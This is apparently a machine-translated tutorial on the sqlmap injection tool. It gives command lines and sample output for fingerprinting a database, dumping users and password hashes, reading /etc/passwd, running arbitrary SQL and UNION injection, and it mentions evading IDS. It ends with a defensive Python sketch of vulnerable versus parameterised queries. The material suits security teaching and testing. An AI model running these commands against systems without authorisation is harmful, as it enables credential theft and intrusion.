
What is SqlMap injection

2025-01-15 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

This article shows you what SqlMap injection is. The content is concise and easy to understand, and I hope the detailed introduction gives you something useful.

From the black defense, we can see that there are some internal tools, foreign injection tools, written in Python. If you want to download it, it turns out to be a VIP tool. I searched Baidu and found nothing. It seems that it is not popular in China. I went straight to Google to search, and found this tool. It's very powerful.

Everything I had in mind before, this tool has made real, and it is more powerful. A powerful tool for a new generation. I don't have time to analyze it. Interested friends can do some research.

Open source and powerful tools. Try not to talk about it.

It supports almost all current databases, which is stronger than any tool in China. I began to wonder if Pangolin originated from it. GET, POST and cookie injection are supported. You can add a cookie and a user-agent. It supports blind injection, error-echo injection, and many other injection methods. It supports proxies and has optimized algorithms, so it is more efficient. It uses fingerprinting to identify the database.

Here are the instructions.

I couldn't help it last night, so I looked at some of it and tested it. The SQL statements in it are too simple, but you can customize them and change them to richer statements, to bypass injection testing and other IDS settings. Later, I'll compile a DOS version for you.

1. Install python2.5 first.

2. Then go to the directory of sqlmap and execute sqlmap

Detailed usage

1. sqlmap -u <injection point>

2. sqlmap -g "keywords" // this injects through a Google search, but it does not work yet. I don't know what the reason is. It can be directly modified to use Baidu.

3. python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1

[hh:mm:25] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:26] [INFO] url is stable
[hh:mm:26] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:26] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:26] [INFO] GET parameter 'id' is dynamic
[hh:mm:26] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter 'id'
[hh:mm:26] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
[hh:mm:26] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:26] [INFO] testing MySQL
[hh:mm:26] [INFO] query: CONCAT('5', '5')
[hh:mm:26] [INFO] retrieved: 55
[hh:mm:26] [INFO] performed 20 queries in 0 seconds
[hh:mm:26] [INFO] confirming MySQL
[hh:mm:26] [INFO] query: LENGTH('5')
[hh:mm:26] [INFO] retrieved: 1
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
[hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:26] [INFO] retrieved: 5
[hh:mm:26] [INFO] performed 13 queries in 0 seconds
remote DBMS: MySQL >= 5.0.0

4. Specify the parameter to inject

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "id"

[hh:mm:17] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:18] [INFO] url is stable
[hh:mm:18] [INFO] testing sql injection on parameter 'id'
[hh:mm:18] [INFO] testing numeric/unescaped injection on parameter 'id'
[hh:mm:18] [INFO] confirming numeric/unescaped injection on parameter 'id'
[hh:mm:18] [INFO] parameter 'id' is numeric/unescaped injectable
[...]

Or if you want to provide more than one parameter, for instance:

$ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -p "cat,id"

5. Specify the method and POST data

python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" --data "id=1&cat=2"

6. Specify a cookie, so that addresses that require a login can be injected

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie "COOKIE_VALUE"

7. Inject through a proxy

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy "http://127.0.0.1:8118"

8. Specify a keyword, or not. Without one, the program judges automatically based on the hash of the returned result.

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string "STRING_ON_TRUE_PAGE"

9. Specify the database type so that the tool does not have to guess among other databases. This improves efficiency.

--remote-dbms

10. Fingerprint the database type

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f

11. Obtain banner information

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b

banner: '5.0.38-Ubuntu_0ubuntu1.1-log'

12. Get the current database, current users, all users, passwords, all available databases.

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --current-db

current database: 'testdb'

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --users

database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'leboyer'
[*] 'root'@'localhost'
[*] 'testuser'@'localhost'

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --passwords

database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
[*] root [1]:
    password hash: *YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
[*] testuser [1]:
    password hash: *ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --dbs

available databases [3]:
[*] information_schema
[*] mysql
[*] testdb

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --tables -D "information_schema"

Database: information_schema
[16 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLLATIONS                            |
| COLUMN_PRIVILEGES                     |
| COLUMNS                               |
| KEY_COLUMN_USAGE                      |
| ROUTINES                              |
| SCHEMA_PRIVILEGES                     |
| SCHEMATA                              |
| STATISTICS                            |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TABLES                                |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --columns -T "user" -D "mysql"

Database: mysql
Table: user
[37 columns]
+-----------------------+------+
| Column                | Type |
+-----------------------+------+
| Alter_priv            | enum |
| Alter_routine_priv    | enum |
| Create_priv           | enum |
| Create_routine_priv   | enum |
| Create_tmp_table_priv | enum |
| Create_user_priv      | enum |
| Create_view_priv      | enum |
| Delete_priv           | enum |
| Drop_priv             | enum |
| Execute_priv          | enum |
| File_priv             | enum |
| Grant_priv            | enum |
| Host                  | char |
| Index_priv            | enum |
| Insert_priv           | enum |
| Lock_tables_priv      | enum |
| max_connections       | int  |
| max_questions         | int  |
| max_updates           | int  |
| max_user_connections  | int  |
| Password              | char |
| Process_priv          | enum |
| References_priv       | enum |
| Reload_priv           | enum |
| Repl_client_priv      | enum |
| Repl_slave_priv       | enum |
| Select_priv           | enum |
| Show_db_priv          | enum |
| Show_view_priv        | enum |
| Shutdown_priv         | enum |
| ssl_cipher            | blob |
| ssl_type              | enum |
| Super_priv            | enum |
| Update_priv           | enum |
| User                  | char |
| x509_issuer           | blob |
| x509_subject          | blob |
+-----------------------+------+

13. Display the content of a specified file, which is generally used for PHP

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --file /etc/passwd

/etc/passwd:
---
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/false
backup:x:34:34:backup:/var/backups:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:104:105:MySQL Server,:/var/lib/mysql:/bin/false
postgres:x:105:107:PostgreSQL administrator,:/var/lib/postgresql:/bin/bash
inquis:x:1000:100:Bernardo Damele,:/home/inquis:/bin/bash
---

14. Execute your own SQL statement.

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -e "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0,1"

[hh:mm:18] [INFO] fetching expression output: 'SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0,1'
[hh:mm:18] [INFO] query: SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0,1
[hh:mm:18] [INFO] retrieved: YYYYYYYYYYYYYYYY
[hh:mm:19] [INFO] performed 118 queries in 0 seconds
SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0,1: 'YYYYYYYYYYYYYYYY'

15. UNION injection

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --union-check

valid union: 'http://192.168.1.47/page.php?id=1 UNION ALL SELECT NULL, NULL, NULL--&cat=2'

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 --union-use --banner

[...]
[hh:mm:24] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:24] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:24] [INFO] confirming inband sql injection on parameter 'id'
[...]
[hh:mm:24] [INFO] fetching banner
[hh:mm:24] [INFO] request: http://192.168.1.47/page.php?id=1 UNION ALL SELECT CONCAT (CHAR), VERSION (), CHAR (CHAR), NULL, NULL--&cat=2
[hh:mm:24] [INFO] performed 1 queries in 0 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1'

16. Save the injection process to a file, and restore the injection process from that file. This is very convenient and a major feature: you can interrupt during the injection and continue when you have time.

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -b -o "sqlmap.log"

[...]
[hh:mm:09] [INFO] fetching banner
[hh:mm:09] [INFO] query: VERSION()
[hh:mm:09] [INFO] retrieved: 5.0.30-Debian_3-log
[hh:mm:11] [INFO] performed 139 queries in 1 seconds
banner: '5.0.38-Ubuntu_0ubuntu1.1-log'

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 --banner -o "sqlmap.log" --resume

[...]
[hh:mm:13] [INFO] fetching banner
[hh:mm:13] [INFO] query: VERSION()
[hh:mm:13] [INFO] retrieved the length of query: 26
[hh:mm:13] [INFO] resumed from file 'sqlmap.log': 5.0.45-Deb
[hh:mm:13] [INFO] retrieved: ian_1ubuntu3-log
banner:
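
The "numeric/unescaped injectable" result and the "valid union" request in the output above both come from one coding pattern in the page being tested. The Python sketch below is an added example, not code from the original article or from sqlmap: it shows that pattern next to the bound and type-checked forms that close it. The pages table, its columns and the function names are assumptions, and SQLite stands in for the MySQL backend.

```python
import re
import sqlite3

# Probe string copied from the "valid union" output above.
PROBE = "1 UNION ALL SELECT NULL, NULL, NULL--"


def make_db():
    """Constructed sample data; the schema behind page.php is an assumption."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, cat INTEGER, title TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?, ?)",
                   [(1, 2, "home"), (2, 2, "about")])
    return db


def fetch_concatenated(db, raw_id):
    """The flawed pattern: the parameter is pasted into the statement
    unquoted and unescaped, so text after the number is parsed as SQL."""
    sql = "SELECT id, cat, title FROM pages WHERE id = " + raw_id
    return db.execute(sql).fetchall()


def fetch_bound(db, raw_id):
    """Binding alone: the whole value is compared as data, never parsed."""
    sql = "SELECT id, cat, title FROM pages WHERE id = ?"
    return db.execute(sql, (raw_id,)).fetchall()


def fetch_hardened(db, raw_id):
    """Binding plus strict typing: reject anything that is not an integer."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a positive integer")
    return fetch_bound(db, int(raw_id))


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", fetch_concatenated(db, PROBE))  # extra all-NULL row
    print("bound:       ", fetch_bound(db, PROBE))         # no rows
    try:
        fetch_hardened(db, PROBE)
    except ValueError as exc:
        print("hardened:    ", exc)
    print("hardened ok: ", fetch_hardened(db, "1"))
```

The rejected request in fetch_hardened is also the natural place to log the raw value, since a non-numeric id on a numeric parameter is a cheap signal that a scanner is testing the page.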
